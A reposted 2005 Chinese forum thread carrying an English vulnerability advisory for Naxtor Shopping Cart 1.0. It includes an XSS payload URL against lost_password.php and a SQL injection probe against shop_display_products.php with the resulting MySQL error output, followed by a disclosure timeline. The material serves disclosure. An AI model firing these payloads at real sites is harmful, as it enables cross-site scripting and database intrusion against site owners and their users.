[转载]Naxtor Shopping Cart lost_password.php多个漏洞及测试

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6828
精华: 834
积分: 36067
阅读权限: 255
性别: 男
来自: 中国
在线时间: 597 小时
注册时间: 2004-6-25
最后登录: 2008-11-18

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-8-5 15:57 只看该作者

[转载]Naxtor Shopping Cart lost_password.php多个漏洞及测试

文章作者：JohnC@NoBytes.com

Hello All,
I have discovered a couple of remote vulnerabilities in: Naxtor Shopping
Cart 1.0
Authors Site: http://www.naxtor.com.au/
Naxtor is described by its authors as:

Naxtor Shopping Cart is one stop solution for companies' interested in
selling merchandise online.

+-[Examples:]--------------------------------------------------+

[1]------------------------------------------------------------+

XSS:

http://www.victim.com/lost_passo ... r%20xss=31337;alert
(xss);</script>&reset=reset

[2]------------------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victim.com/shop_display_products.php?cat_id='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/navigation.php on line 13

Warning: mysql_numrows(): supplied argument is not a valid MySQL result
resource in /var/www/html/shop_display_products.php on line 180

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/shop_display_products.php on line 181

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 15/06/2005
Author(s) Informed on: 16/06/2005
Author(s) Response: NONE
Author(s) Fix: NONE

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››